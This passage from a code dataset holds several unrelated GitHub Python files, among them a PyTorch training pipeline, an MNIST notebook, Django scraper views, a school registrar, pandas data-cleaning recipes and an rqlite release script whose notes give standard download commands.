resnet_layers['avgpool']})\n\tresnet_1, resnet_2 = nn.Sequential(resnet_1_dct), nn.Sequential(resnet_2_dct)\n\tresnet_3, resnet_4 = nn.Sequential(resnet_3_dct), nn.Sequential(resnet_4_dct)\n\tmodel = UpCi2(out_classes=out_classes, rs=[resnet_1, resnet_2, resnet_3, resnet_4], modes=modes, down_conv=down_conv)\n\treturn model.to(device)\n\ndef save_logs(losses, accuracy, name):\n\tif 'logs' not in os.listdir():\n\t\tos.mkdir('logs')\n\tif name not in os.listdir('logs'):\n\t\tos.mkdir('logs/' + name)\n\tfor dct_name, dct in zip(['losses', 'accuracy'], [losses, accuracy]):\n\t\twith open('logs/' + name + '/' + dct_name + '.json', 'w') as f:\n\t\t\tjson.dump(dct, f)\n\n\ndef train_model_UpSi2(model, device, dataloaders, losses_weights=[1, 1, 1], num_epochs=15, modes='all',\n\t\t\t\t\t\tdown_conv=False, save_log=True, name='test', save_model=1, show_tests=False, test_data=None):\n\t\"\"\"\n\tmodel: model\n\tdevice: torch.device()\n\tdataloaders: dict(train_loader, test_loader)\n\tlosses_weights: class_loss, contiguity_loss, sparsity_loss\n\tnum_epochs: max_epoches\n\tmodes: layers for optimizer\n\tsave_log: True/False\n\tname: name for saves\n\tsave_model: 0 -> None, 1 -> save best, 2 -> save every epjch\n\tshow_tests: True/False show results of test_data\n\ttest_data: test_data -> list(tensor(1,3,H,W))\n\t\"\"\"\n\toptimizers = {'resnet_1': torch.optim.Adam(model.resnet_1.parameters(), weight_decay=0.01),\n\t\t\t\t 'resnet_2': torch.optim.Adam(model.resnet_2.parameters(), weight_decay=0.01),\n\t\t\t\t 'resnet_3': torch.optim.Adam(model.resnet_3.parameters(), weight_decay=0.01),\n\t\t\t\t 'resnet_4': torch.optim.Adam(model.resnet_4.parameters(), weight_decay=0.01),\n\t\t\t\t 'unet': torch.optim.Adam(model.unet.parameters(), lr=0.0005, weight_decay=0.01),\n\t\t\t\t 'linear': torch.optim.Adam(model.linear.parameters(), weight_decay=0.01), }\n\t# scheduler = torch.optim.lr_scheduler.StepLR(optimizers['unet'], step_size=5, gamma=0.25)\n\topt_list = ['unet', 'linear']\n\tif down_conv:\n\t\toptimizers.update({'down_1': torch.optim.Adam(model.down1.parameters(), lr=0.0005, weight_decay=0.01)})\n\t\toptimizers.update({'down_2': torch.optim.Adam(model.down2.parameters(), lr=0.0005, weight_decay=0.01)})\n\t\toptimizers.update({'down_3': torch.optim.Adam(model.down3.parameters(), lr=0.0005, weight_decay=0.01)})\n\t\topt_list += ['down_1', 'down_2', 'down_3']\n\n\tif modes=='all':\n\t\tfor itm in ['resnet_1', 'resnet_2', 'resnet_3', 'resnet_4']:\n\t\t\topt_list.append(itm)\n\telse:\n\t\tfor itm in modes:\n\t\t\topt_list.append(itm)\n\tloss_fn = torch.nn.CrossEntropyLoss()\n\n\tlosses = {'train': {}, 'test': {}}\n\taccuracy = {'train': {}, 'test': {}}\n\tres_model = 0\n\n\tfor epoch in trange(num_epochs, desc=f\"All train process\"):\n\t\t# scheduler.step()\n\t\tfor phase in ['train', 'test']:\n\t\t\tif phase == 'train':\n\t\t\t\tmodel.train()\n\t\t\telse:\n\t\t\t\tmodel.eval()\n\n\t\t\ttotal = 0\n\t\t\tcorrect = 0\n\n\t\t\tfor X_batch, y_batch in tqdm_notebook(dataloaders[phase], leave=False,\n\t\t\t\t\t\t\t\t\t\t\t\t desc=f\"Epoch ({phase})- {epoch + 1}\"):\n\t\t\t\tX_batch = X_batch.to(device)\n\t\t\t\ty_batch = y_batch.to(device)\n\t\t\t\tif phase == 'train':\n\t\t\t\t\tfor mod in opt_list:\n\t\t\t\t\t\toptimizers[mod].zero_grad()\n\n\t\t\t\tif phase == 'train':\n\t\t\t\t\ty_pred = model(X_batch)\n\t\t\t\telse:\n\t\t\t\t\twith torch.no_grad():\n\t\t\t\t\t\ty_pred = model(X_batch)\n\n\t\t\t\tpreds = torch.argmax(y_pred, -1)\n\t\t\t\ttotal += y_batch.size(0)\n\t\t\t\tcorrect += (preds == y_batch).sum().item()\n\n\t\t\t\tclass_loss = loss_fn(y_pred, y_batch) * losses_weights[0]\n\t\t\t\tcont_loss = model.losses.continuity_loss.continuity_loss * losses_weights[1]\n\t\t\t\tspars_loss = model.losses.sparse_loss.sparse_loss * losses_weights[2]\n\n\t\t\t\tloss = class_loss + cont_loss + spars_loss\n\n\t\t\t\tif phase == 'train':\n\t\t\t\t\tloss.backward()\n\t\t\t\t\tfor mod in opt_list:\n\t\t\t\t\t\toptimizers[mod].step()\n\n\t\t\t\tlosses[phase][epoch] = [float(class_loss), float(cont_loss), float(spars_loss)]\n\t\t\taccuracy[phase][epoch] = float(correct / total)\n\n\t\tprint(f'{name} - Epoch-{epoch + 1} {phase} loss:{sum(losses[phase][epoch]):.3f} <-> accuracy: {accuracy[phase][epoch]:.3f}')\n\t\tprint(f'class_loss:{losses[phase][epoch][0]:.3f}, contiguity_loss:{losses[phase][epoch][1]:.3f}, sparsity_loss:{losses[phase][epoch][2]:.3f}')\n\n\t\t# save_log\n\t\tif save_log:\n\t\t\tsave_logs(losses, accuracy, name)\n\n\t\t# save_model\n\t\tif save_model == 1:\n\t\t\tloss_sum = sum(losses['test'][epoch])\n\t\t\tif epoch > 3:\n\t\t\t\tif loss_sum < res_model:\n\t\t\t\t\ttorch.save(model.state_dict(), './logs/' + name + '/' + name + '_best_model.pth')\n\t\t\t\t\tres_model = loss_sum\n\t\t\telse:\n\t\t\t\tres_model = loss_sum\n\t\t\t\ttorch.save(model.state_dict(), './logs/' + name + '/' + name + '_best_model.pth')\n\t\telif save_model == 2:\n\t\t\ttorch.save(model.state_dict(), './logs/' + name + '/' + name + '_epoch' + str(epoch) +'.pth')\n\n\t\t# show_tests\n\t\tif show_tests and test_data:\n\t\t\tfor itm in test_data:\n\t\t\t\tget_eval_mask([model], itm, device, mode=\"show\", epoch=epoch)\n\treturn model, losses, accuracy\n\ndef get_eval_mask(models, img, device, mode=\"show\", epoch=None): # img -> tensor((1, 1, 244, 244))\n # original\n\toriginal = img.squeeze().numpy().transpose((1, 2, 0))\n\tmean = np.array([0.5, 0.5, 0.5])\n\tstd = np.array([0.5, 0.5, 0.5])\n\toriginal = std * original + mean\n\toriginal = np.clip(original, 0, 1)\n\n\t# mask\n\tmasks = []\n\tfor model in models:\n\t\tmodel.eval()\n\t\tunet_part = model.unet\n\t\twith torch.no_grad():\n\t\t\tresult = unet_part(img.to(device))\n\t\tmask = result.detach().cpu().squeeze().numpy()\n\t\tmasks.append(mask)\n\n\tif mode == 'show':\n\t\tncols = len(models)\n\t\tfig, ax = plt.subplots(nrows=1, ncols=ncols+1, figsize=(12, 7))\n\t\tif epoch:\n\t\t\tax[0].set_title('epoch: ' + str(epoch), color='g')\n\t\tax[0].imshow(original)\n\t\tax[0].set_xticks([])\n\t\tax[0].set_yticks([])\n\t\tax[0].set_xticklabels([])\n\t\tax[0].set_yticklabels([])\n\t\tfor i in range(ncols):\n\t\t\tax[i+1].set_title('model: ' + str(i + 1))\n\t\t\tax[i+1].imshow(masks[i])\n\t\t\tax[i+1].set_xticks([])\n\t\t\tax[i+1].set_yticks([])\n\t\t\tax[i+1].set_xticklabels([])\n\t\t\tax[i+1].set_yticklabels([])\n\telse:\n\t\treturn masks","repo_name":"PumPums/cv","sub_path":"Unsupervised_Segmentation/v2/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":7141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"25380604109","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[41]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# In[42]:\n\n\ndata_path =\"C:\\\\Users\\\\Buse\"\ntrain_data = np.loadtxt(data_path + \"\\mnist_train.csv\", \n delimiter=\",\")\ntest_data = np.loadtxt(data_path + \"\\mnist_test.csv\", \n delimiter=\",\")\n\n\n# In[43]:\n\n\nimage_size = 28 # width and length\nno_of_different_labels = 10 # i.e. 0, 1, 2, 3, ..., 9\nimage_pixels = image_size * image_size #784\ndata_path = \"data/mnist/\"\ntest_data[:10]\n\n\n# In[44]:\n\n\ntrain_data.ndim, train_data.shape\n\n\n# In[45]:\n\n\ntrain_data[10,0]\n\n\n# In[46]:\n\n\nim_3=train_data[10,:] #resimde 10.satır tamamen alındı 3 dahil \n\n\n# In[47]:\n\n\nim_3.shape ## im_3te butun pixel bilgisi var\n\n\n# In[48]:\n\n\nim_4=im_3[1:] #label ı attık\n\n\n# In[49]:\n\n\nim_4.shape\n\n\n# In[50]:\n\n\nim_5=im_4.reshape(28,28)\n\n\n# In[52]:\n\n\nplt.imshow(im_5)\nplt.show()\n\n\n# In[53]:\n\n\nplt.imshow(im_5,cmap=\"gray\")\nplt.show()\n\n\n# In[54]:\n\n\n60000 ,785 ; 1+ 28*28\n\n\n# In[55]:\n\n\n#train datada kac tane 3 oldugunu bulan fonksiyonu yaz.\n#60000 data var 785 lik ve bir tanesi label 28*28lik resimler.\n\n\n# In[56]:\n\n\nm,n=train_data.shape\nm,n\n\n\n# In[57]:\n\n\ndef my_counter(k=0):\n s=0\n for i in range(m):\n if(train_data[i,0]==k): # burada 3 degeri label degeri oluyor ve label'da hangi sayı oldugunu gosteriyor datasetinde.\n s=s+1 #i satır j sutun degerleri\n return s\n\n\n# In[58]:\n\n\nfor i in range(10):\n c=my_counter(i) \n print(i,\" \",c)\n\n\n# In[59]:\n\n\nprint(my_counter(2))\n\n\n# In[60]:\n\n\n#sıfır digitinin sol üstteki pixelin ortalaması ve standart sapma degeri nedir ?\n\n\n# In[61]:\n\n\n# digit_class=train_data[i,0]\n # top_left=train_data[i,1]\n # bottom_right=train_data[i,784]\n # print(digit_class,end=\" \")\n # print(top_left,end=\" \")\n # print(bottom_right,end=\" \") #end son kareketere bosluk bırakıyor.\n\n\n# In[62]:\n\n\nimport math\ndef my_pdf_1(x, mu=0.0 , sigma=1.0):\n x= float(x -mu) / sigma\n return math.exp(-x*x/2.0) / math.sqrt(2.0*math.pi) / sigma\n\n\n# In[63]:\n\n\nmy_pdf_1(10,1,3)\n\n\n# In[64]:\n\n\n#m,n=im_1.shape\n\n\n# In[65]:\n\n\ndef get_my_mean_and_std(k=0,l=350):\n s=0 # kactane sıfır var onu saysın//kac digit oldugu\n #k=0 # sınfı bilgisi yani digitin\n t=0 #intersitiy degeri pixeldeki\n #l=350 #location ı belirtiyor.classın pixel degeri\n for i in range(m): #ortalamayı buldurdu\n if(train_data[i,0]==k):\n s=s+1\n t=t+train_data[i,l+1]\n # digit_class=train_data[i,0]\n #top_left=train_data[i,1]\n #bottom_right=train_data[i,784]\n # print(digit_class,end=\" \")\n #print(top_left,end=\" \")\n # print(bottom_right,end=\" \\n\") \n mean_1=t/s\n\n s=0\n t=0\n for i in range(m):\n if(train_data[i,0]==k):\n s=s+1\n diff_1=train_data[i,l+1]-mean_1\n t=t+diff_1*diff_1\n #var_1=t/(s-1)\n std_1=np.sqrt(t/(s-1))\n\n print(mean_1,std_1)\n return mean_1,std_1\n # train_data[i,0] #label\n # train_data[i,1] #sol üstteki deger\n # train_data[i,784]#en alt kosedeki deger \n\n\n# In[66]:\n\n\n#yukarda ortalamayı bulduk, ortalama ve varyansı olan degerin pdf degeri nedir ?\n\n\n# In[68]:\n\n\nm_1,std_1=get_my_mean_and_std(2,100)\n#my_pdf_1(test_value,m_1,std_1) #(40 intersitiy degerinin ) 2.labelın 100. pixelinde 40 degerinin bulunma olasılıgı\n#test value yerine normalde 40 degerini yazmıstık.\n\n\n# In[71]:\n\n\nim_1=plt.imread(\"1.png\")\nplt.imshow(im_1,cmap='gray')\nplt.show()\n#test_value=im_1[0,0,0]\n\n\n# In[ ]:\n\n\n#resmin hangi sayı oldugunu buldurunuz.\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"busekara/image-processing","sub_path":"ders-5.py","file_name":"ders-5.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"14270355268","text":"from django.conf import settings\nfrom django.db.models import Prefetch\nfrom django_countries import countries\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\n\nfrom scraper_etsy.items.models import Request\nfrom scraper_etsy.items.serializer import RequestSerializer, CountriesSerializer\nfrom scraper_etsy.items.tasks import search\n\n\nclass RequestViewSet(viewsets.ModelViewSet):\n serializer_class = RequestSerializer\n queryset = Request.objects.filter(level=0).prefetch_related(\n Prefetch(\n \"children\",\n queryset=Request.objects.select_related(\n \"item__shop\"\n ).exclude(item__isnull=True),\n to_attr=\"children_have_item\"\n ),\n \"children_have_item__item__tags\"\n ).select_related(\"filter\")\n url = \"https://www.etsy.com/search?q={}\"\n\n def perform_create(self, serializer):\n serializer.validated_data.update({'url': self.url.format(serializer.validated_data['search'])})\n super(RequestViewSet, self).perform_create(serializer)\n search.s(serializer.instance.id).apply_async(countdown=settings.COUNTDOWN_FIRST_RUN)\n\n\nclass FilterView(viewsets.views.APIView):\n @staticmethod\n def get(request):\n data = {\n \"filter\": {\n 'countries': [],\n 'limit': settings.LIMIT,\n 'count_tags': settings.COUNT_TAGS,\n 'sales': settings.SALES,\n 'year_store_base': settings.YEAR_STORE_BASE,\n },\n \"countries\": CountriesSerializer(countries, many=True).data\n }\n return Response(data)\n","repo_name":"spiritEcosse/scraper_etsy","sub_path":"scraper_etsy/items/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8378639428","text":"from prettytable import PrettyTable\r\nfrom file_reader import read_file\r\nimport unittest\r\nimport os\r\nfrom collections import defaultdict\r\n\r\n\r\nclass Student:\r\n \"A class that stores all the information about students.\"\r\n pt_hdr = ['CWID', 'Name', 'Completed Courses']\r\n def __init__(self, cwid, name, major):\r\n self.cwid = cwid\r\n self.name = name\r\n self.major = major\r\n self.courses = dict() #key is course, value is grade (we're not using defaultdict because we'll always have a value for the course)\r\n self.labels = ['cwid', 'name', 'major', 'courses']\r\n\r\n def add_course(self, course, grade):\r\n \"\"\"A function that assigns a value grade to the key course.\"\"\"\r\n self.courses[course] = grade\r\n \r\n def pt_row(self):\r\n \"\"\"\"A function that creates rows with student's information.\"\"\"\r\n return [self.cwid, self.name, sorted(self.courses.keys())]\r\n \r\n\r\nclass Instructor:\r\n \"\"\"A class that stores all the information about instructors.\"\"\"\r\n pt_hdr = ['CWID', 'Name', 'Dept', 'Course', 'Students']\r\n\r\n def __init__(self, cwid, name, department):\r\n self.cwid = cwid\r\n self.name = name\r\n self.department = department\r\n self.students = defaultdict(int) #defaultdict specifies only value type\r\n\r\n def add_course(self, course):\r\n self.students[course] += 1\r\n \r\n def pt_row(self):\r\n \"\"\"A function that creates rows with instructor's information.\"\"\"\r\n for course, num_students in self.students.items():\r\n yield [self.cwid, self.name, self.department, course, num_students]\r\n\r\n\r\nclass Repository:\r\n \"\"\"A class that stores information about students and instructors and generates tables of students and instructors.\"\"\"\r\n def __init__(self, path, ptables =True):\r\n self.students = dict() #cwid is the key, Instance of class Student is the value\r\n self.instructors = dict() #cwid is they, Instance of class Instructor is the value\r\n self.grades = list()\r\n\r\n self.reading_students(os.path.join(path, 'students.txt'))\r\n self.get_instructors(os.path.join(path, 'instructors.txt'))\r\n self.get_grades(os.path.join(path, 'grades.txt'))\r\n\r\n if ptables:\r\n print(\"\\nStudent Summary\")\r\n self.student_table()\r\n\r\n print(\"\\nInstructor Summary\")\r\n self.instructor_table()\r\n\r\n def student_table(self):\r\n \"\"\"A function that creates a table with student's information.\"\"\"\r\n pt = PrettyTable(field_names = Student.pt_hdr)\r\n for student in self.students.values():\r\n pt.add_row(student.pt_row())\r\n print (pt)\r\n \r\n def instructor_table(self):\r\n \"\"\"A function that creates a table with instructor's information.\"\"\"\r\n pt = PrettyTable(field_names = Instructor.pt_hdr)\r\n for instructor in self.instructors.values():\r\n for row in instructor.pt_row():\r\n pt.add_row(row) \r\n print (pt)\r\n\r\n def reading_students(self, path):\r\n \"\"\"A function that assigns student's information (cwid, name, major) to his/her cwid.\"\"\"\r\n try:\r\n for cwid, name, major in read_file(path, 3, '\\t', header=False):\r\n self.students[cwid] = Student(cwid, name, major)\r\n except ValueError as e:\r\n print(e)\r\n \r\n def get_instructors(self, path):\r\n \"\"\"A function that assigns instructor's information (cwid, name, dept) to instructor's cwid.\"\"\"\r\n try:\r\n for cwid, name, dept in read_file(path, 3, sep = '\\t', header=False):\r\n self.instructors[cwid] = Instructor(cwid, name, dept)\r\n except ValueError as e:\r\n print(e)\r\n \r\n def get_grades(self, path):\r\n \"\"\"A function that adds courses and grades to students and instructors.\"\"\"\r\n try:\r\n for student_cwid, course, grade, instructor_cwid in read_file(path, 4, sep = '\\t', header=False):\r\n if student_cwid in self.students:\r\n self.students[student_cwid].add_course(course, grade)\r\n else:\r\n print(\"unknown student\")\r\n if instructor_cwid in self.instructors:\r\n self.instructors[instructor_cwid].add_course(course)\r\n else:\r\n print(\"instructor not found\")\r\n except ValueError as e:\r\n print (e)\r\n\r\ndef main():\r\n path = ('/Users/katya/Documents/GitHub/Registrar-Database')\r\n stevens = Repository(path)\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"esbevinova/Registrar-Database","sub_path":"school_registrar.py","file_name":"school_registrar.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"25381128578","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Wrap the wiki settings.\"\"\"\nfrom typing import Optional\n\nfrom bs4 import BeautifulSoup as Soup\nfrom requests import get\n\nfrom .utils import sanitize_topic\n\nLANGUAGE = 'en'\n\nWIKIPEDIA_TAGS = {\n 'title':\n ['span', {'class': 'mw-page-title-main'}],\n}\n\n\nclass WikiArticle:\n \"\"\"Provide a representation of a wikipedia article.\"\"\"\n WIKI_URL = \"https://{language}.wikipedia.org/wiki\"\n\n def __init__(self, topic: str, language: Optional[str] = LANGUAGE):\n \"\"\"Initialize the wiki article.\"\"\"\n self.topic = sanitize_topic(topic)\n self.url = self.WIKI_URL.format(language=language) + '/' + self.topic\n self.article = self.populate_article()\n self.title = self.retrieve_title()\n self.sections = self.retrieve_sections()\n\n def populate_article(self) -> Soup:\n \"\"\"Soup the page of an article.\"\"\"\n response = get(self.url, timeout=30)\n return Soup(response.text)\n\n def retrieve_title(self) -> str:\n \"\"\"Retrieve the title from the article.\"\"\"\n return self.article.find(WIKIPEDIA_TAGS.get('title')[0],\n WIKIPEDIA_TAGS.get('title')[1]).text\n\n def retrieve_sections(self) -> list:\n \"\"\"Retrieve the sections.\"\"\"\n\n\n","repo_name":"sempervent/python-wiki-cli","sub_path":"python-wiki-cli/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71840001548","text":"import pytest\n\nfrom src.abbreviation import abbreviation, abbreviation_dp\n\ncases = [\n (\"daBcd\", \"ABC\", True),\n (\"aaAA\", \"AA\", True),\n (\"AbCdE\", \"AFE\", False),\n (\"beFgH\", \"EFG\", False),\n (\"beFgH\", \"EFH\", True),\n]\n\n\n@pytest.mark.parametrize(\"a, b, expected\", cases)\ndef test_abbreviation(a, b, expected):\n result = abbreviation(a, b)\n assert result == expected\n\n\n@pytest.mark.parametrize(\"a, b, expected\", cases)\ndef test_abbreviation_dp(a, b, expected):\n result = abbreviation_dp(a, b)\n assert result == expected\n","repo_name":"yxtay/code-ex","sub_path":"tests/test_abbreviation.py","file_name":"test_abbreviation.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"9667461379","text":"from sie import SIE\n\n__all__ = [\"SIEServidores\"]\n\n\nclass SIEServidores(SIE):\n def __init__(self):\n super(SIEServidores, self).__init__()\n self.path = \"V_SERVIDORES\"\n\n def getServidorByCPF(self, CPF):\n params = {\n \"CPF_SEM_MASCARA\": CPF,\n \"LMIN\": 0,\n \"LMAX\": 1\n }\n return self.api.performGETRequest(self.path, params, cached=self.cacheTime).content[0]","repo_name":"unirio-dtic/projetos_ensino","sub_path":"modules/sie/SIEServidores.py","file_name":"SIEServidores.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"39501336781","text":"import pandas as pd\nimport numpy as np\nfrom itertools import combinations\n\n\n# recipes for exploring datasets\n\n\ndef find_candidate_keys(df, max_columns=3):\n candidate_keys = []\n columns = df.columns.tolist()\n column_powerset = []\n # generate power set of columns\n for i in range(max_columns):\n combo = combinations(columns, i+1)\n column_powerset.extend(combo)\n # test elements in powerset\n for combo in column_powerset:\n ck = False\n if df[list(combo)].duplicated().sum() == 0:\n ck = True\n for k in candidate_keys:\n if set(combo).issuperset(set(k)):\n ck = False\n if ck:\n candidate_keys.append(combo)\n \n return candidate_keys\n\n\ndef find_no_variance_columns(df):\n no_var_columns = []\n columns = df.columns.tolist()\n for c in columns:\n if df[c].nunique() in [0, 1]:\n no_var_columns.append(c)\n \n return no_var_columns\n\n\ndef find_low_variance_columns(df, threshold:int):\n low_var_columns = []\n columns = df.columns.tolist()\n for c in columns:\n if 1 < df[c].nunique() <= threshold:\n low_var_columns.append((c, df[c].nunique()))\n \n return low_var_columns\n\n\ndef find_dependent_columns(df, key:list, drop_no_variance=True):\n dependent_columns = []\n columns = df.columns.tolist()\n if drop_no_variance:\n no_var_columns = find_no_variance_columns(df)\n if no_var_columns:\n for c in no_var_columns:\n columns.remove(c)\n for k in key:\n columns.remove(k)\n for c in columns:\n unique_elements = df.groupby(key)[c].nunique().unique().tolist()\n if (unique_elements == [1]) or (unique_elements == [0]) or (unique_elements == [0, 1]) or (unique_elements == [1, 0]):\n dependent_columns.append(c)\n \n return dependent_columns\n\n\n# recipes to transform datasets\n\n\ndef split_lists(df, pk_columns:list, list_column:str, delim=\",\"):\n new_df = df[pk_columns + [list_column]].copy()\n new_df[list_column] = df[list_column].str.split(pat=delim)\n new_df_exploded = new_df.explode(list_column).dropna().reset_index(drop=True)\n return new_df_exploded\n\n\ndef de_dummify(df, pk_columns:list, dummy_columns:list, col_name:str):\n new_df = df[pk_columns + dummy_columns].copy()\n # propogate the category/column name for rows where it is true\n for c in dummy_columns:\n new_df[c] = np.where(new_df[c]==1, c, None)\n # create a list out of the categories, and explode/melt the list\n new_df[col_name] = new_df[dummy_columns].values.tolist()\n new_df = new_df.drop(columns=dummy_columns).explode(col_name).dropna()\n return new_df\n\n\ndef decompose_table(df, primary_key:list):\n # find which columns belong in this table\n table_columns = set(find_dependent_columns(df, primary_key))\n if len(primary_key) > 1:\n for column in primary_key:\n dependent_cols = set(find_dependent_columns(df, [column]))\n table_columns -= dependent_cols\n # create the new table\n new_df = df[primary_key + list(table_columns)].copy().dropna(subset=primary_key).drop_duplicates().reset_index(drop=True)\n return new_df\n\n\n# recipes to verify specified constraints in datasets\n\n\ndef check_ids_ref_integrity(primary_df, pdf_id:str, related_df, rdf_fk:list or str, verbose = False):\n if type(rdf_fk) == str:\n rdf_fk = [rdf_fk]\n \n ref_integrity = True\n missing_ids = set()\n \n p_ids = set(primary_df[pdf_id].dropna().unique())\n for c in rdf_fk:\n f_ids = set(related_df[c].dropna().unique())\n diff = f_ids - p_ids\n if len(diff):\n ref_integrity = False\n missing_ids.update(diff)\n \n if verbose:\n return missing_ids\n else:\n return ref_integrity\n\n \ndef check_key_uniqueness(df, key:list):\n orig_rows = len(df)\n mod_df = df.drop_duplicates(subset=key)\n mod_rows = len(mod_df)\n if orig_rows == mod_rows:\n return True\n else:\n return False","repo_name":"jenna-jordan/tidy-pandas-cookbook","sub_path":"demonstration_notebooks/.ipynb_checkpoints/recipes-checkpoint.py","file_name":"recipes-checkpoint.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"26274738587","text":"#!/usr/bin/env python\n\nimport re\nimport requests\nimport subprocess\nimport os\n\nrelease_template = \"\"\"\n_rqlite_ is a lightweight, distributed relational database, which uses [SQLite](https://www.sqlite.org/) as its storage engine. rqlite provides an easy-to-use, fault-tolerant store for your most important relational data. You can learn a lot more about rqlite at [rqlite.io](https://www.rqlite.io).\n\nRelease {release} {release_specific_notes}. See the [CHANGELOG](https://github.com/rqlite/rqlite/blob/master/CHANGELOG.md) for full details on this release, and check out the _Assets_ section below for prebuilt binaries.\n\n## Getting started\n\nTo download and run a single rqlite node follow the directions below. It's also very easy to run a rqlite cluster -- you can learn more by checking out the [documentation](https://rqlite.io/docs/clustering/).\n\nIf you wish to build rqlite from source, check out [this documentation](https://github.com/rqlite/rqlite/blob/master/CONTRIBUTING.md).\n\n### Docker\nRun a single node as follows:\n```\ndocker pull rqlite/rqlite\ndocker run -p4001:4001 rqlite/rqlite\n```\n\nCheck out the [rqlite Docker page](https://hub.docker.com/r/rqlite/rqlite/) for more details on running nodes via Docker.\n\n### Linux\n_Builds for a variety of CPU architectures are available. See the Assets section below._\n\nTo download and start rqlite, execute the following in a shell.\n\n```\ncurl -L https://github.com/rqlite/rqlite/releases/download/{release}/rqlite-{release}-linux-amd64.tar.gz -o rqlite-{release}-linux-amd64.tar.gz\ntar xvfz rqlite-{release}-linux-amd64.tar.gz\ncd rqlite-{release}-linux-amd64\n./rqlited ~/node.1\n```\n\n### macOS\n\nTo download and start rqlite on macOS, execute the following in a shell.\n\n```\ncurl -L https://github.com/rqlite/rqlite/releases/download/{release}/rqlite-{release}-darwin-amd64.tar.gz -o rqlite-{release}-darwin-amd64.tar.gz\ntar xvfz rqlite-{release}-darwin-amd64.tar.gz\ncd rqlite-{release}-darwin-amd64\n./rqlited ~/node.1\n```\n\n#### Homebrew\n```brew install rqlite```\n\n### Windows\n\nrqlite can be built for Windows, and Windows compatibility is ensured via [AppVeyor](https://www.appveyor.com/). However you may need to build a specific release yourself, though the top-of-tree build [is available for download](https://ci.appveyor.com/api/projects/otoolep/rqlite/artifacts/rqlite-latest-win64.zip?branch=master) from AppVeyor. Check out the [CI build for Windows](https://ci.appveyor.com/project/otoolep/rqlite) for more details. Please note that I do not control the build process in AppVeyor and you download and use those binaries at your own risk.\n\"\"\"\n\ndef generate_release_notes(release, features):\n return release_template.format(release=release, release_specific_notes=features)\n\ndef validate_release_string(release_str):\n pattern = re.compile(r'^v\\d+\\.\\d+\\.\\d+$')\n return pattern.match(release_str)\n\ndef get_release_string():\n while True:\n release_str = input(\"Enter a release string in the format vX.Y.Z: \")\n if validate_release_string(release_str):\n return release_str\n else:\n print(\"Invalid release string. Please try again.\")\n\ndef get_github_token():\n token = input(\"Enter your GitHub Personal Access Token: \")\n return token\n\ndef get_release_features():\n notes = input(\"Enter release features: \")\n return notes\n\ndef create_github_release(release_str, token, notes):\n headers = {\n 'Authorization': f'token {token}',\n 'Accept': 'application/vnd.github+json'\n }\n data = {\n 'tag_name': release_str,\n 'name': release_str,\n 'body': notes\n }\n url = 'https://api.github.com/repos/rqlite/rqlite/releases'\n response = requests.post(url, headers=headers, json=data)\n if response.status_code != 201:\n response.raise_for_status()\n return response.json()['id']\n\ndef confirm_bash_command(command):\n print(\"\\nAbout to run the following bash command:\")\n print(\" \".join(command))\n confirmation = input(\"\\nDo you want to proceed? (yes/no): \")\n return confirmation.lower() == \"yes\"\n\ndef invoke_package_script(release_str, release_id, token):\n if os.path.exists('package.sh'):\n command = ['./package.sh', release_str, str(release_id), token]\n if confirm_bash_command(command):\n subprocess.run(command, check=True)\n else:\n print(\"Aborting program.\")\n exit(1)\n else:\n print(\"package.sh not found. Please ensure it's in the current working directory.\")\n\ndef confirm_CHANGELOG():\n confirmation = input(\"Have you dated the CHANGELOG?: \")\n return confirmation.lower() == \"yes\"\n\ndef confirm_release_notes(release_notes):\n print(\"\\nRelease Notes:\")\n print(release_notes)\n confirmation = input(\"\\nDo the release notes look good? (yes/no): \")\n return confirmation.lower() == \"yes\"\n\ndef main():\n while True:\n if not confirm_CHANGELOG():\n continue\n\n release_str = get_release_string()\n features = get_release_features()\n release_notes = generate_release_notes(release_str, features)\n \n if confirm_release_notes(release_notes):\n break\n else:\n print(\"Please enter the release string and release-specific notes again.\\n\")\n\n token = get_github_token()\n\n try:\n release_id = create_github_release(release_str, token, release_notes)\n print(f\"Release created with ID: {release_id}\")\n invoke_package_script(release_str, release_id, token)\n except requests.HTTPError as e:\n print(f\"An error occurred while creating the release: {e}\")\n except subprocess.CalledProcessError as e:\n print(f\"An error occurred while running package.sh: {e}\")\n except Exception as e:\n print(f\"An unexpected error occurred: {e}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rqlite/rqlite","sub_path":"scripts/release_creator.py","file_name":"release_creator.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","stars":14181,"dataset":"github-code","pt":"82"} +{"seq_id":"38624154595","text":"\n\n####\n####use lstm to predict the overall trend of lotto numbers\nfrom sklearn.preprocessing import MinMaxScaler\n##normalize the dataset\nscaler = MinMaxScaler(feature_range=(0,1))\nlook_back = 16\npath = \"/Users/marsly/data.csv\"\nimport loadDataFromCsv\ndataset = loadDataFromCsv.load_data_from_csv(path)\n\ndataset_red_x, dataset_red_y = 